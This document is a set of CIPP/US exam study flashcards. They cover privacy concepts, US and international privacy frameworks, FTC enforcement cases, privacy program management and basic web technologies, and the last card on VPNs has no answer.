CIPP / US Book Flashcards

1
Q

Privacy has been defined as . . .

A

the desire of people to freely choose the circumstances and the degree to which individuals will expose their attitudes and behavior to others

2
Q

4 Categories or classes of privacy and examples

A
  1. Information privacy
    - financial information, medical information, government records and records of a person’s activities on the Internet
  2. Bodily privacy
    - genetic testing, drug testing or body cavity searches, birth control, abortion and adoption
  3. Territorial privacy
    - video surveillance, ID checks, and use of similar technology and procedures
  4. Communications privacy
    - postal mail, telephone conversations, email, and other forms of communicative behavior and apparatus
3
Q

Although the word privacy does not appear in the Constitution, a number of provisions relate to privacy, including:

A
  • The 3rd Amendment, banning quartering of soldiers in a person’s home
  • The 4th Amendment, generally requiring a search warrant before the police can enter a home or business
  • The 5th Amendment, prohibiting persons from being compelled to testify against themselves
  • The 14th Amendment, with its requirement of due process under the law, including for intrusions into a person’s bodily autonomy
4
Q

Which state’s constitution has protection for privacy?

A

The California Constitution contains an explicit guarantee of the right to privacy, which the people of California added to the California Constitution by a ballot measure in November 1972

5
Q

Universal Declaration of Human Rights with respect to privacy

A

The declaration formally announced that “no one shall be subjected to arbitrary interference with his privacy, family, home or correspondence.”

6
Q

Fair Information Practices (FIPs) and their categories

A

Are guidelines for handling, storing and managing data with privacy, security and fairness in an information society that is rapidly evolving

4 categories: rights of individuals, controls on the information, information lifecycle, and management

7
Q

Fair Information Practices widely used today date back to . . .

A

1973 report by the US Dept of Health, Education, and Welfare Advisory Committee on Automated System

8
Q

What is the most widely recognized framework for FIPs, one that has been endorsed by the Federal Trade Commission and many other government organizations?

A

OECD Guidelines

9
Q

OECD Guidelines provide the following privacy framework

A
  1. Collection principle
  2. Use limitation principle
  3. Purpose specification principle
  4. Openness principle
  5. Data quality principle
  6. Individual participation principle
  7. Accountability principle
  8. Security safeguard principle
10
Q

Who passed Convention 108?

A

In 1981, the Council of Europe passed the Convention for the Protection of Individuals with Regard to the Automatic Processing of Personal Data (“Convention 108”)

11
Q

What did Convention 108 require member states to do?

A

This convention required member states of the Council of Europe that signed the treaty to incorporate certain data protection provisions into their domestic law

12
Q

APEC

A

A multinational organization with 21 Pacific coast members in Asia and the Americas. Unlike the EU, the APEC organization operates under nonbinding agreement. It was established in 1989 to enhance economic growth for the region

13
Q

APEC Privacy Principles

A

CUP N’ CIA SA

  1. Collection limitation
  2. Uses of personal information
  3. Preventing harm
  4. Notice
  5. Choice
  6. Integrity of personal information
  7. Access and correction
  8. Security safeguard
  9. Accountability
14
Q

Madrid Resolution

A

There were dual purposes for the Madrid Resolution: to define a set of principles and rights guaranteeing (1) the effective and internationally uniform protection of privacy with regard to the processing of personal data and (2) the facilitation of the international flows of personal data needed in a globalized world

15
Q

In response to the “Big Brother is watching” scare of the 1970s, following George Orwell’s 1949 book 1984 . . .

A
  1. In 1970 the German state of Hesse enacted the first known modern data protection law. This German law was motivated in part by the growing potential of IT systems as well as a desire to prevent a recurrence of the personal information abuses that took place under Hitler’s Third Reich before and during World War II
  2. The United States passed its first national privacy law in 1970, the Fair Credit Reporting Act, which focused solely on information about consumer credit
16
Q

Personal information and personally identifiable information (PII)

A

Generally used to define the information that is covered by privacy laws
- Ex./ names, social security numbers or passport numbers.
The terms also include information about an “identified” or “identifiable” individual.
- Ex./ street address, telephone number, and email address are generally considered sufficiently related to a particular person to count as identifiable info within the scope of privacy protections

17
Q

Sensitive personal information

A

The definition of what is considered sensitive varies depending on jurisdiction and particular regulations. In the United States, Social Security numbers and financial information are commonly treated as sensitive information, as are driver’s license numbers and health information

18
Q

How can personal information become non-personal information?

A

If the data elements used to identify the individual are removed, the remaining data becomes nonpersonal information, and privacy and data protection laws generally do not apply. Similar terms used include de-identified or anonymized information

19
Q

As an example of how different regimes have defined the line between personal and nonpersonal information, consider the Internet Protocol (IP) address, the number that identifies the location of a computer in communications over the Internet

A

The EU considers IP addresses “personal data,” taking the view that IP addresses are identifiable. A court in Ireland, however, determined that IP addresses did not constitute personal information. In the United States, federal agencies operating under the Privacy Act do not consider IP addresses to be covered by the statute

20
Q

Public records

A

consist of information collected and maintained by a government entity and available to the public

Examples: real estate records in some jurisdictions contain detailed information about ownership, assessed value, amount paid for the parcel, taxes imposed on the parcel, and improvements

21
Q

Publicly available information

A

Information that is generally available to a wide range of persons.

Examples: names and addresses in telephone books and information published in newspapers or other public media. Today, search engines are a major source of publicly available information

22
Q

Nonpublic information

A

Not generally available or easily accessed due to law or custom

Examples: medical records, financial information and adoption records. A company’s customer or employee database usually contains nonpublic information

23
Q

Data subject

A

(first widely used in the EU)
the individual about whom information is being processed, such as the patient at a medical facility, the employee of a company or the customer of a retail store

24
Q

Data controller

A

An organization that has the authority to decide how and why personal information is to be processed. This entity is the focus of most obligations under privacy and data protection laws—it controls the use of personal information by determining the purposes for its use and the manner in which the information will be processed

The data controller may be an individual or an organization that is legally treated as an individual, such as a corporation or partnership

25
Q

Data processor

A

An individual or organization, often a third-party outsourcing service, that processes data on behalf of the data controller. Under the Health Insurance Portability and Accountability Act (HIPAA) medical privacy rule, these data processors are called “business associates.”

26
Q

Over time, countries have adopted comprehensive privacy and data protection laws for a combination of at least three reasons

A
  1. Remedy past injustices
  2. Ensure consistency with European privacy laws
  3. Promote electronic commerce
27
Q

Co-regulatory model emphasizes . . .

A

Emphasizes industry development of enforceable codes or standards for privacy and data protection against the backdrop of legal requirements by the government. Co-regulation can exist under both comprehensive and sectoral models

Ex./ Children’s Online Privacy Protection Act in the United States

28
Q

Self-regulatory model emphasizes . . .

A
  • Emphasizes creation of codes of practice for the protection of personal info by a company, industry or independent body
  • In contrast to the co-regulatory model, there may be no generally applicable data protection law that creates a legal framework for the self-regulatory code

Examples: Payment Card Industry Data Security Standard (PCI-DSS), seal programs

29
Q

CAN-SPAM provides the FTC and the FCC with the authority to . . .

A

CAN-SPAM provides the FTC and the FCC with the authority to issue regulations that set forth exactly how the opt-out mechanism must be offered and managed

30
Q

CAN-SPAM Act

A

Requires the senders of commercial email messages to offer an “opt-out” option to recipients of these messages

31
Q

What purposes does notice have?

A

Notices have two purposes: (1) consumer education and (2) corporate accountability

32
Q

Opt-in example

A

“May we share your information?” Failure to answer would result in the information not being shared

33
Q

Opt out example

A

If a company states “unless you tell us not to, we may share your information,” the person has the ability to opt out of the sharing by saying no. Failure to answer would result in the information being shared

34
Q

FTC has general and specific authority in . . .

A

The FTC has general authority to enforce against unfair and deceptive trade practices, notably including the power to bring “deception” enforcement actions where a company has broken a privacy promise.

In certain areas, such as marketing communications and children’s privacy, the FTC has specific regulatory authority

35
Q

Federal agencies that have regulatory authority over particular sectors

A

Federal banking regulatory agencies (such as the Consumer Financial Protection Bureau, Federal Reserve, and Office of the Comptroller of the Currency), the FCC, the U.S. Department of Transportation, and the U.S. Department of Health and Human Services, through its Office of Civil Rights

36
Q

Examples of self-regulatory regimes

A
  • Network Advertising Initiative
  • The Direct Marketing Association
  • The Children’s Advertising Review Unit
37
Q

6 questions to ask to understand laws

A
  1. Who is covered by this law?
  2. What types of information (and what uses of information) are covered?
  3. What exactly is required or prohibited?
  4. Who enforces the law?
  5. What happens if I don’t comply?
  6. Why does this law exist?
38
Q

California SB 1386 - Who is Covered?

A
  • Entities that do business in California and that own or license computerized data, including personal info. It applies to natural persons, legal persons and gov’t agencies.
  • Companies in MN or NY don’t count (although they may wish to be careful about what counts as “doing business”); even if they conduct business in CA, they are not covered if they don’t have computerized data
39
Q

California SB 1386 - What types of information (and what uses of information) are covered?

A

Regulates the computerized personal information of CA residents. “Personal information” is an individual’s name in combination with any one or more of the following: (1) Social Security number; (2) California identification card number; (3) driver’s license number; or (4) financial account, credit, or debit card number in combination with security code, access code or password information required to permit access to an individual’s financial account, when either the name or the data elements are NOT ENCRYPTED

40
Q

California SB 1386 - What exactly is required or prohibited?

A
  • Requires all persons to disclose any breach of system security to any resident of California whose unencrypted personal info was or is reasonably believed to have been acquired by an unauthorized person
  • A breach of the security of the system means unauthorized acquisition of computerized data that compromises the security, confidentiality or integrity of personal info maintained by the person
  • Disclosure must be made in as expedient a manner as possible.

Exceptions: good faith acquisition of personal information by an employee or agent of the business, provided the personal information is not used or subject to further unauthorized disclosure

41
Q

California SB 1386 - Who enforces the law?

A

The California attorney general enforces the law, and there is a private right of action

42
Q

California SB 1386 - What is the consequence for noncompliance?

A

The California attorney general or any citizen can file a civil lawsuit against a noncompliant party seeking damages and forcing compliance

43
Q

California SB 1386 - Why does this law exist?

A

SB 1386 was enacted because security breaches of computerized databases are feared to cause identity theft—and individuals should be notified about these breaches so they can take steps to protect themselves. Anyone with a security breach that puts people at real risk of identity theft should consider notifying them even if they are not subject to this law

44
Q

True or false? The Fair Credit Reporting Act (FCRA), for instance, has a private right of action, allowing individuals to sue a company if their consumer reports have been used inappropriately

A

True

45
Q

Administrative enforcement actions

A

Are carried out pursuant to the statutes that create and empower an agency, such as the FTC and the FCC

46
Q

Why was the FTC founded?

A
  • The FTC was founded in 1914 to enforce antitrust laws, and its general consumer protection mission was established by a statutory change in 1938.
  • The FTC navigates both roles today, and privacy and computer security issues have become an important part of its work.
  • The FTC is an independent agency instead of falling under the direct control of the president
47
Q

U.S. Department of State with respect to privacy internationally

A

Has been increasingly active over time on privacy, especially by negotiating internationally on privacy issues with other countries and in multinational groups such as the United Nations or the Organization for Economic Co-operation and Development (OECD)

48
Q

U.S. Department of Commerce with respect to privacy internationally

A

Plays a leading role in federal privacy policy development and administers the Privacy Shield Framework between the United States and the EU

49
Q

U.S. Department of Transportation with respect to privacy internationally

A
  • The agency responsible for transportation companies under its jurisdiction and for enforcing violations of the Privacy Shield Framework between the U.S. and the EU for some transportation companies.
  • Within DOT, the Federal Aviation Administration (FAA) has recently played an increasing role for drones.
  • The National Highway Traffic Safety Administration (NHTSA), also within DOT, addresses privacy and security issues for connected cars
50
Q

U.S. Office of Management and Budget with respect to privacy

A

The lead agency for interpreting the Privacy Act of 1974, which applies to federal agencies and private-sector contractors to those agencies. The OMB also issues guidance to agencies and contractors on privacy and information security issues, such as data breach disclosure and privacy impact assessments

51
Q

U.S. Department of Homeland Security

A

Faces numerous privacy issues, such as the E-Verify program for new employees, rules for air traveler records (Transportation Security Administration), as well as immigration and other border issues (Immigration and Customs Enforcement)

52
Q

FTC has general authority in theory to issue regulations to implement protections against unfair and deceptive acts and practices, which are promulgated under

A
  • Any such regulation must comply with the complex and lengthy procedures under the Magnuson-Moss Warranty Federal Trade Commission Improvement Act of 1975.
  • As of the date of writing, the FTC had not put forth any privacy or information security regulation under its Magnuson-Moss authority
53
Q

FTC step 1: The FTC has broad investigatory authority . . .

A

The FTC has broad investigatory authority, including the authority to subpoena witnesses, issue civil investigative demands and require businesses to submit written reports under oath

aka Step 1 of FTC action

54
Q

Step 2 - FTC: Following an investigation . . .

A

The commission may initiate an enforcement action if it has reason to believe a law is being or has been violated

55
Q

Step 3 - FTC: The commission issues a complaint, and . . .

A

An administrative trial can proceed before an administrative law judge (ALJ). If a violation is found, the ALJ can enjoin the company from continuing the practices that caused the violation

56
Q

How do appeals work after an investigation in the FTC?

A

The decision of the ALJ can be appealed to the five commissioners. That decision, in turn, can be appealed to federal district court

57
Q

Both the company and the FTC have incentives to negotiate a consent decree rather than proceed with a full adjudication process

A

Company: avoids a prolonged trial, negative ongoing publicity, avoids having the details of its business practices exposed to the public

FTC: (1) achieves a consent decree that incorporates good privacy and security practices, (2) avoids the expense and delay of a trial and (3) gains an enforcement advantage because monetary fines are much easier to assess in federal court if a company violates a consent decree than if no decree is in place

58
Q

What is the FTC’s sunset policy?

A

Under the FTC’s “Sunset Policy,” administrative orders such as consent decrees are imposed for up to 20 years

59
Q

Before the FTC began using consent decrees for privacy, what were they used for?

A

Its Bureau of Consumer Protection negotiated such decrees for other consumer protection issues such as false advertising or unfair debt collection practices under Section 5 of the FTC Act

60
Q

In the Matter of GeoCities, Inc

A
  • GeoCities operated a website that provided an online community through which users could maintain personal home pages. Users were required to fill out an online form that requested certain personal info, w/ which Geocities created an extensive info database.
  • Geocities promised on its website that the collected info would not be sold or distributed w/o user consent
  • FTC alleged GeoCities misrepresented how it would use info collected from its users by reselling the info to 3rd parties, which violated its privacy notice
  • GeoCities settled the action and the FTC issued a consent order » required GeoCities to post and adhere to a conspicuous online privacy notice that disclosed to users how it would collect and use personal info
61
Q

The FTC brought an enforcement action against Eli Lilly and Company, what was that about?

A
  • Eli Lilly and Company (pharmaceutical manufacturer) maintained a website where users could provide personal info for messages and updates reminding them to take their medication
  • The website included a privacy notice that made promises about the security and privacy of the info provided
  • Eli Lilly decided to end the program » sent subscribers an email announcement » accidentally revealed the email addresses of all subscribers
  • FTC and Eli Lilly reached a settlement » required Eli Lilly to adhere to representations about how it collects, uses, and protects user info
  • It required, for the first time in an online privacy and security case, that Eli Lilly develop and maintain an information privacy and security program
62
Q

What is required for a practice to be considered “deceptive”?

A

For a practice to be deceptive, it must involve a material statement or omission that is likely to mislead consumers who are acting reasonably under the circumstances

63
Q

What are some examples of deceptive practices?

A
  • False promises
  • Misrepresentations
  • Failures to comply with representations made to consumers, such as statements in privacy policies and Safe Harbor or Privacy Shield certifications
64
Q

In the Matter of Nomi

A
  • Nomi provided a service to brick-and-mortar businesses whereby Nomi placed sensors in these retail businesses to detect the MAC addresses of mobile devices that are searching for Wi-Fi service
  • Nomi used the info that it collected to provide analytics reports to its business clients about their customers’ retail traffic patterns
  • According to the FTC, Nomi misled consumers about the ability to opt out of their service and failed to inform these consumers about the location of stores where the tracking was taking place.
  • The consent order that Nomi entered into w/ the FTC restricted the company from continuing to engage in these business practices for 20 years
65
Q

In the Matter of Snapchat

A
  • Snapchat promised its customers that its app provided a private, short-lived messaging service
  • The consumer set a timer for the snap to be viewed, and after that time expired the snap disappeared “forever.”
  • Snapchat’s app included a feature to “Find Friends” that appeared to the user as the only means to choose to provide info to the company about individuals the user knew.
  • According to the FTC, Snapchat was aware of numerous methods that could be employed to save chats indefinitely, and it was actually collecting the names and phone numbers of all contacts in the user’s mobile device address book » Snapchat failed to adequately secure the Find Friends feature.
  • Because of the lax security measures, hackers managed to compile a database of millions of user names and phone numbers and subjected these individuals to spam, phishing, and other unsolicited communications.
  • Snapchat entered into a consent order w/ the FTC in 2014 agreeing that it would not engage in these business practices for the next 20 yrs
66
Q

In the Matter of TRUSTe, Inc

A
  • TRUSTe, Inc. (now doing business as TrustArc) is a business that provides certifications to companies regarding privacy issues.
  • The business has provided a seal to companies that have privacy practices in compliance with standards such as COPPA and the U.S.-EU Safe Harbor Framework.
  • According to the FTC, TRUSTe failed to conduct annual recertifications in more than 1,000 instances from 2006 to Jan 2013, despite claiming to conduct recertifications every year on its website
  • In the settlement agreement w/ FTC, TRUSTe was required to maintain comprehensive records for 10 yrs related to its certifications and to pay a $200,000 civil penalty
67
Q

By 2004, the FTC began to enforce “unfair” practices, which can be defined as?

A

Unfair claims can exist even where the company has not made any deceptive statements if the injury is substantial, lacks offsetting benefits, and cannot be easily avoided by consumers

68
Q

When does the FTC sanction companies for unfair practices? What case does it come from?

A

The FTC has sanctioned companies for unfair practices when they failed to implement adequate protection measures for sensitive personal information or when they provided inadequate disclosures to consumers.

In 2015, a federal appellate court determined that a company does not act appropriately “when it publishes a privacy policy to attract customers who are concerned about data privacy, fails to make good on that promise by investing inadequate resources in cybersecurity, exposes its unsuspecting customers to substantial financial injury, and retains the profits for their business” (FTC v. Wyndham Worldwide Corp.).

69
Q

In the Matter of Wyndham Worldwide Corp.

A

Wyndham Worldwide Corporation, a hotel company, suffered three hacks to its systems from 2008 to 2009 » FTC investigated Wyndham for unfair and deceptive trade practices » FTC asserted that Wyndham:
- Stored credit card info in unencrypted text
- Permitted passwords for property management systems to be easily guessable
- Failed to use firewalls between individual hotels, corporate systems and the Internet
- Allowed out-of-date operating systems to run on property management systems and failed to update these computers w/ timely security updates
- Failed to adequately control computer access by 3rd-party vendors
- Did not have unauthorized access detection measures in place
- Failed to add security measures after they suffered known breaches
FTC sought to sanction » Wyndham initially chose not to settle the case. In 2012, the FTC filed suit against the company in U.S. District Court. Wyndham challenged the FTC’s authority to require the company to meet more than the minimum standards set forth in the FTC Act, Sec 5 » Dist Ct ruled for the FTC » 3d Cir. Ct affirmed for the FTC: the FTC’s longstanding authority to regulate “unfair methods of competition in or affecting commerce” under the FTC Act Sec 5 extended to regulation of cyberspace practices that are harmful to consumers

70
Q

In the Matter of LabMD, Inc.

A
  • LabMD was significantly hacked on two separate occasions in 2009 and 2012.
  • According to the FTC’s complaint, sensitive patient info for thousands of LabMD customers was taken in the 1st hack and placed on a peer-to-peer file-sharing network. Info included names, Social Security numbers, birth dates, health insurance provider info, and standardized medical treatment codes
  • LabMD was hacked a 2nd time » at least 500 customer names and Social Security numbers were found in the possession of identity thieves
  • FTC brought an enforcement action under FTC Act, Sec 5 claiming that LabMD engaged in unfair trade practices by failing to take appropriate measures to prevent unauthorized disclosure of sensitive data on its network
  • Rather than enter into a consent order w/ FTC, LabMD chose to proceed w/ an administrative hearing before an ALJ
71
Q

In the Matter of LifeLock, Inc.

A
  • LifeLock case illustrates the ongoing consequences for a company operating under an FTC consent decree
  • In 2006, LifeLock began an advertising campaign claiming that it could prevent all identity theft in exchange for consumers paying a monthly fee for its services.
  • Prominent in the LifeLock ads was the Social Security number of the company’s CEO.
  • In 2010, the FTC brought an enforcement action against the company, asserting LifeLock’s business practice was deceptive because its approach to protecting customers against identity theft addressed only certain forms of identity theft.
  • FTC alleged that LifeLock failed to encrypt its customers’ data or to properly restrict access to data held by the company, putting the data it held at risk
72
Q

In the Matter of DesignerWare, LLC

A
  • DesignerWare case illustrated FTC unfairness concerns that go beyond data breach
  • DesignerWare licensed software to rent-to-own companies to help them track and recover rented computers » the software could log keystrokes, capture screenshots, and take photographs using a computer’s webcam
  • Data gathered by DesignerWare and provided to rent-to-own stores revealed sensitive info about computer users: user names and passwords; Social Security numbers; medical and financial records; and webcam pictures of children, partially undressed individuals, and intimate activities.
  • DesignerWare used geolocation tracking software w/o obtaining permission of the computer users and presented a fake software program registration screen on the users’ computer that tricked individuals into providing their personal contact info.
  • FTC alleged that DesignerWare and the 7 rent-to-own companies involved engaged in the unfair practices of surreptitiously collecting webcam photos and consumer info and inappropriately using geolocation info, and in the deceptive practice of using fake software registration. In a consent order entered into w/ FTC, the companies agreed not to engage in these practices for 20 yrs
73
Q

A White House Report contains a preface signed by President Obama and defines the “Consumer Privacy Bill of Rights” based on traditional fair information practices. What are they?

A

IRS TAFA

  1. Individual control
  2. Respect for context
  3. Security
  4. Transparency
  5. Access and accuracy
  6. Focused collection
  7. Accountability
74
Q

The FTC Report, issued shortly after the White House Report, states many of the same themes. In its summary, the FTC emphasizes three areas:

A
  1. Privacy by design
  2. Simplified consumer choice
  3. Transparency
75
Q

The FTC Report, issued shortly after the White House Report, states many of the same themes. In its summary, the FTC emphasizes three areas. The FTC also announced five priority areas for attention:

A
  1. Do not track mechanism
  2. Mobile
  3. Data brokers
  4. large platforms providers
  5. Promotion of enforceable self-regulatory codes
76
Q

In which cases did the FTC not challenge the companies’ own data security practices, but instead charge that the companies were selling products that were not safe enough and thus caused product users to expose their personal data to risks that seemed unfair?

A
  • ASUS failed to address security issues with routers, and hackers exploited these security flaws to gain unauthorized access to the storage units of 12,900 customers.
  • TRENDnet failed to secure live video feeds from 700 customers, allowing hackers to post links to these live video feeds.
77
Q

Apart from statutes, is state common law an additional source of privacy enforcement?

A

Yes. Plaintiffs can sue under the privacy torts, which traditionally have been categorized as intrusion upon seclusion, appropriation of name or likeness, publicity given to private life, and publicity placing a person in false light

78
Q

Failure to comply with the PCI DSS

A

Failure to comply can lead to exclusion from Visa, MasterCard or other major payment card systems, as well as penalties of $5,000 to $100,000 per month

79
Q

_______ and _______ play an important role in providing assurances that companies are complying with self-regulatory programs.

A

Third-party privacy seal and certification programs play an important role in providing assurances that companies are complying with self-regulatory programs

80
Q

Digital Advertising Alliance (DAA)

A

A coalition of media and advertising organizations. The DAA helped develop an icon program, intended to inform consumers about how they can exercise choice with respect to online behavioral advertising. The AdChoices system allows users to click on an icon near an ad or to visit the AdChoices website and choose to what extent the user will view behavioral ads from participating advertisers

81
Q

OECD adopted the Recommendation on Cross-Border Co-operation in the Enforcement of Laws Protecting Privacy. The recommendation calls for member countries to:

A
  • Discuss the practical aspects of privacy law enforcement cooperation
  • Share best practices in addressing cross-border challenges
  • Work to develop shared enforcement priorities
  • Support joint enforcement initiatives and awareness campaigns
82
Q

What did the FTC and other enforcement authorities around the world establish in response to the OECD recommendation?

A

In response to the recommendation, the FTC, along with enforcement authorities from around the world, established the Global Privacy Enforcement Network (GPEN) in 2010

83
Q

What is the goal of the Global Privacy Enforcement Network (GPEN)?

A

GPEN aims to promote cross-border information sharing as well as investigation and enforcement cooperation among privacy authorities around the world

84
Q

APEC Cross-border Privacy Enforcement Arrangement (CPEA)

A

Aims to establish a framework for participating members to share information and evidence in cross-border investigations and enforcement actions in the Asia-Pacific region

85
Q

In designing and administering a privacy program, an organization should consider and balance four types of risks

A
  1. legal risks
  2. reputational risks
  3. operational risks
  4. investment risks
86
Q

Four Basic Steps for Information Management

A
  1. Discover
    - Issue identification and self-assessment
    - Determination of best practices
  2. Build
    - Procedure development and verification
    - Full implementation
  3. Communicate
    - Documentation
    - Education
  4. Evolve
    - Affirmation and monitoring
    - Adaptation
87
Q

Data inventory

A

This inventory should include both customer and employee data records. It should document data location and flow as well as evaluate how, when and with whom the organization shares such information—and the means for data transfer used. This sort of inventory is legally required for some institutions, such as those covered by the Gramm-Leach-Bliley Act (GLBA) Safeguards Rule. The benefits of the inventory apply more generally, because it identifies risks that could affect reputation or legal compliance

88
Q

Data Classification

A
  • Defines the clearance of individuals who can access or handle that data, as well as the baseline level of protection appropriate for that data.
  • Most orgs handle different types of PI, such as personnel and customer records, as well as other info the org treats as sensitive, such as trade secrets and business plans
  • In the U.S., classification is often important for compliance purposes because of sector-specific privacy and security laws
89
Q

Documenting data flows

A

An organization chart can be useful to help map and document the systems, applications and processes for handling data. Documenting data flows helps identify areas for compliance attention

90
Q

Determining data accountability

A

Some helpful questions for privacy professionals when doing due diligence and for an organization to consider as it addresses privacy risks:

LSEWHU

  • Where, how and for what length of time is the data stored?
  • How sensitive is the info?
  • Should the info be encrypted?
  • Will the info be transferred to or from other countries, and if so, how will it be transferred?
  • Who determines the rules that apply to the info?
  • How is the information to be processed, and how will these processes be maintained?
  • Is the use of such data dependent upon other systems?
91
Q

Decision: One or Multiple Privacy Policies?

A

One policy will work if an organization has a consistent set of values and practices for all its operations. Multiple policies may make sense for a company that has well-defined divisions or lines of business, especially if each division uses customer data in very different ways, does not typically share PI with other divisions, and is perceived in the marketplace as a different business

92
Q

What happens if a privacy policy is not strict enough?

A

If the policy is not strict enough, then consumers, regulators, and the press may criticize the company for its failure to protect privacy.

93
Q

What happens if a privacy policy is too strict?

A

If a policy is too strict, then open-ended statements or overly ambitious security promises can result in legal penalties or reputational problems if the organization cannot satisfy its promises

94
Q

What should happen if a privacy policy is revised?

A

If a privacy policy is revised, the organization should announce the change first to employees, then to both current and former customers through its privacy notice. The FTC stated that a “material” change “at a minimum includes sharing consumer information with third parties after committing at the time of collection not to share the data.”

95
Q

What are some ways organizations can use multiple methods to communicate privacy notices to consumers (and other external stakeholders)?

A
  1. Make the notice accessible online
  2. Make the notice accessible in places of business
    - Clearly post the organization’s privacy notice at the location of business in areas of high customer traffic and in legible form
    - Organization staff also should have ready access to copies of the up-to-date company privacy policy in case a customer wishes to obtain a copy for review.
  3. Provide updates and revisions
  4. Ensure that the appropriate personnel are knowledgeable about the policy
96
Q

What are some acts that are Opt-in?

A

COPPA, HIPAA, FCRA

97
Q

No consumer choice / no option situations are referred to as ______

A

The 2010 preliminary FTC staff report, “Protecting Consumer Privacy in an Era of Rapid Change,” called these situations “commonly accepted practices.” In such situations, an organization has been given implied authority to share PI

98
Q

Opt-out / consumer choice and remedy for noncompliance (FTC)

A

An opt-out privacy notice creates an enforceable promise. If an organization sells the information of individuals who have opted out, the FTC or state enforcers may bring suit under the unfair and deceptive trade practices laws

99
Q

What type of consumer choice or lack thereof does the Video Privacy Protection Act have?

A

The Video Privacy Protection Act requires an opt-out before covered movie and other rental data is provided to a third party

100
Q

What type of consumer choice or lack thereof does the CAN-SPAM Act have?

A

The CAN-SPAM Act requires email marketers to provide an opt-out

101
Q

What type of consumer choice or lack thereof does the GLBA have?

A

GLBA requires an opt-out before transferring the PI of a customer of a financial institution to an unaffiliated third party for the latter’s own use

102
Q

When are opt-outs required for companies?

A

Opt-outs are required for companies that subscribe to any of a number of self-regulatory systems.

Ex./ the Data and Marketing Association has long operated an opt-out system for consumers who do not wish to receive commercial mail sent to their homes; the Network Advertising Initiative, TrustArc, and the Digital Advertising Alliance operate opt-out systems in connection with online advertising

103
Q

Effective management of user preferences can become quite challenging, especially for orgs that interact with their customers w/ multiple channels and for multiple products. What are some of these challenges?

A
  1. The scope of an opt-out can vary
  2. The mechanism for providing an opt-out or other user preferences can also vary
  3. Linking a user’s interactions through multiple channels, including in person, by phone, by email or by web, can be a management challenge when customers interact with an organization
  4. The time period for implementing user preferences is sometimes provided by law
  5. Third-party vendors often process PI on behalf of the company that has the customer relationship
104
Q

Customer access under the FCRA

A

Individuals have the right to access their credit reports under FCRA and rectify incorrect data

105
Q

Customer access under HIPAA

A

Patients can access their medical records under HIPAA, with records that the patient believes are incorrect noted as such in the patient files

106
Q

To ensure the responsibility and security of data once it is in the hands of a contractor or vendor, precautions to consider incorporating in written contracts include:

A
  1. Confidentiality provision
  2. No further use of shared information
  3. Use of subcontractors
  4. Requirement to notify and to disclose breach
  5. Information security provisions
107
Q

Standards for selecting vendors may include:

A
  1. Reputation
  2. Financial condition and insurance
  3. Information security controls
  4. Point of transfer
  5. Disposal of information
  6. Employee training and awareness
  7. Vendor incident response
  8. Audit rights
108
Q

Key new provisions introduced in the GDPR include:

A

(1) notification of security breaches,
(2) new requirements for processors (contractors who act on behalf of data controllers),
(3) designation of data protection officers,
(4) accountability obligations,
(5) rules for international transfers and
(6) sanctions of up to 4 percent of worldwide revenues

109
Q

Schrems v. Data Protection Commission

A

European Court of Justice struck down the Safe Harbor program in significant part based on U.S. government surveillance concerns raised by the 2013 Snowden disclosures

110
Q

The primary lawful bases for transfer of data between the EU and the United States include:

A

(1) The Privacy Shield Framework,
(2) Standard Contract Clauses (SCCs) and
(3) Binding Corporate Rules (BCRs)

111
Q

EU-U.S. Privacy Shield, the agreement sets forth:

A

(1) commitments by U.S. companies, (2) detailed explanations of U.S. laws, and (3) commitments by U.S. authorities.

U.S. companies wishing to import personal data from the EU under the Privacy Shield accept obligations on how that data can be used, and those commitments are legally binding and enforceable.

112
Q

Binding Corporate Rules (BCRs)

A

Are an additional basis for transferring data, providing that a multinational company can transfer data between countries after certification of its practices by an EU privacy supervisory agency

113
Q

Schrems II

A
  • The legality of SCCs has been challenged in the EU, again based largely on the fact that the U.S. government can conduct national security surveillance on data that enters the country.
  • At the time of this writing, the case has been referred to the EU’s highest court, the European Court of Justice, to determine whether SCCs may be used to transfer data to the United States
114
Q

The precursor to the Internet we know today was the . . .

A

ARPAnet, a military computer network developed in the early 1960s by the U.S. Advanced Research Projects Agency (ARPA)

115
Q

The web historically functioned based on two key technologies:

A
  1. Hypertext transfer protocol (HTTP)
  2. Hypertext markup language (HTML)

116
Q

Hypertext transfer protocol (HTTP)

A

An application protocol that manages data communications over the Internet, defines how messages are formatted and transmitted over a TCP/IP network (defined below) for websites. Further, it defines what actions web servers and web browsers take in response to various commands.

117
Q

Hypertext markup language (HTML)

A
  • A content-authoring language used to create web pages
  • The web browser interprets the HTML markup language within a web page to determine how the content on the page should be rendered
  • Document “tags” can be used to format and lay out a web page’s content and to “hyperlink”—connect dynamically—to other web content
  • Forms, links, pictures and text may all be added with minimal commands. Headers are also embedded into the text and are used by web servers to process commands and return data with each request
118
Q

Hyper Text Transfer Protocol Secure (HTTPS)

A

Allows the transfer of data from a browser to a website over an encrypted connection. By early 2016, HTTPS traffic became greater than HTTP traffic

119
Q

HTML5

A

5th and most recent version of the HTML standard

  • New capabilities and features: the ability to run video, audio, and animation directly from websites w/o the need for a plug-in (a piece of software that runs in the browser and renders media such as audio or video)
  • It had significant implications for the rapidly expanding mobile ecosystem, as many mobile devices do not support Flash (discussed further below).
  • Features: increases security, the ability to store information offline, in web applications that can run when not connected to the Internet
120
Q

Extensible markup language (XML)

A

Another language that facilitates the transport, creation, retrieval and storage of documents. Like HTML, XML uses tags to describe the contents of a web page or file. HTML describes the content of a web page in terms of how it should be displayed. Unlike HTML, XML describes the content of a web page in terms of the data that is being produced, enabling automatic processing of data in large volumes and necessitating attention to privacy issues

121
Q

URL

A

The address of documents and other content that are located on a web server. An example of a URL is “https://iapp.org.” This URL contains: (1) an HTTPS prefix to indicate its use of the protocol; (2) “www” to signify a location on the World Wide Web; (3) a domain name (e.g., “iapp”); and (4) an indicator of the top-level domain (e.g., “com” for a commercial organization, “org” for an organization, “gov” for government, “edu” for an educational institution, or a two-letter country code, such as “uk” for United Kingdom or “jp” for Japan).

122
Q

hyperlink

A

Used to connect an end user to other websites, parts of websites, and/or web-enabled services. The URL of another site is embedded in the HTML code of a site so that when a user clicks on the link in the web browser, the end user is transported to the destination website or page

123
Q

web server

A

A computer that is connected to the Internet, hosts web content and is configured to share that content. Documents that are viewed on the web are actually located on individual web servers and accessed by a browser

124
Q

proxy server

A
  • An intermediary server that provides a gateway to the web
  • Employee access to the web often goes through a proxy server
  • A proxy server typically masks what is happening behind the org’s firewall, so that an outside website sees only the IP address and other characteristics of the proxy server, and not detailed info about which part of an organization is communicating with the outside website
125
Q

Virtual private networks (VPNs)

A

